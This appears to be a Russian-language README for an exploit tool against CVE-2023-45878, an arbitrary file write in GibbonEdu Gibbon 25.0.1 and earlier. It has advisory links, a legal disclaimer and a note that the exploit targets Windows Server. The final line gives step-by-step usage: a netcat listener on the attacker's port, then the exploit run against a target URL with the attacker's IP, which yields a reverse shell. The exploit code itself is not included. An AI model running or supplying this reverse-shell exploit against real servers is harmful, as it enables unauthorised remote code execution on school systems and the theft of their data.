
CVE-2023-45878 easy exploit | revers sehell
GibbonEdu Gibbon версия 25.0.1 и ранее позволяет произвольную запись файлов
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
Данный эксплойт предоставляется только в образовательных и исследовательских целях. Несанкционированное использование этого кода против систем без явного разрешения незаконно и может нарушать законы о киберпреступности в различных юрисдикциях. Я не несу ответственности за любое неправомерное использование или ущерб, причиненный этим эксплойтом.
Пользователь несет ответственность за соблюдение всех применимых законов и этических норм перед выполнением этого кода. Не используйте этот эксплойт для вредоносных действий.
Этот эксплойт работает исключительно на Windows Server. Если уязвимая версия Gibbon работает на сервере Linux, вам потребуется соответствующим образом изменить эксплойт.
nc -lnvp <PORT>go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT> или ./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>